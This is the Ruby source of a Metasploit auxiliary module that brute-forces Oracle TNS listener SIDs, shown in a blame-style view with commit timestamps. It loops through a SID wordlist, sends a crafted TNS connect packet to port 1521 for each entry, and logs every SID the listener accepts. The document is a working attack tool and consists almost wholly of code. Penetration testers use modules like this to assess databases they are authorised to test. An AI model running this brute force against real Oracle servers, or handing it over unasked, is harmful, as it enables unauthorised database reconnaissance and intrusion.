2009-07-16 00:03:50 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2009-07-16 00:03:50 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::TNS
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Oracle TNS Listener SID Brute Forcer',
|
|
|
|
'Description' => %q{
|
|
|
|
This module simply attempts to discover the protected SID.
|
|
|
|
},
|
|
|
|
'Author' => [ 'MC' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'URL', 'https://www.metasploit.com/users/mc' ],
|
|
|
|
[ 'URL' , 'http://www.red-database-security.com/scripts/sid.txt' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jan 7 2009'))
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(1521),
|
|
|
|
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
|
|
|
|
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
|
|
|
|
], self.class)
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
s = datastore['SLEEP']
|
|
|
|
list = datastore['SIDFILE']
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Starting brute force on #{rhost}, using sids from #{list}...")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
fd = File.open(list, 'rb').each do |sid|
|
|
|
|
login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))"
|
|
|
|
pkt = tns_packet(login)
|
2010-07-01 23:33:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
connect
|
|
|
|
rescue => e
|
|
|
|
print_error(e.to_s)
|
|
|
|
disconnect
|
|
|
|
return
|
|
|
|
end
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
sock.put(pkt)
|
|
|
|
select(nil,nil,nil,s.to_i)
|
|
|
|
res = sock.get_once(-1,3)
|
|
|
|
disconnect
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if ( res and res =~ /ERROR_STACK/ )
|
|
|
|
''
|
|
|
|
else
|
|
|
|
report_note(
|
|
|
|
:host => rhost,
|
|
|
|
:port => rport,
|
|
|
|
:type => 'oracle_sid',
|
|
|
|
:data => "PORT=#{rport}, SID=#{sid.strip}",
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
print_good("#{rhost}:#{rport} Found SID '#{sid.strip}'")
|
|
|
|
end
|
|
|
|
end
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Done with brute force...")
|
|
|
|
fd.close
|
2009-07-16 00:03:50 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-07-16 00:03:50 +00:00
|
|
|
end
|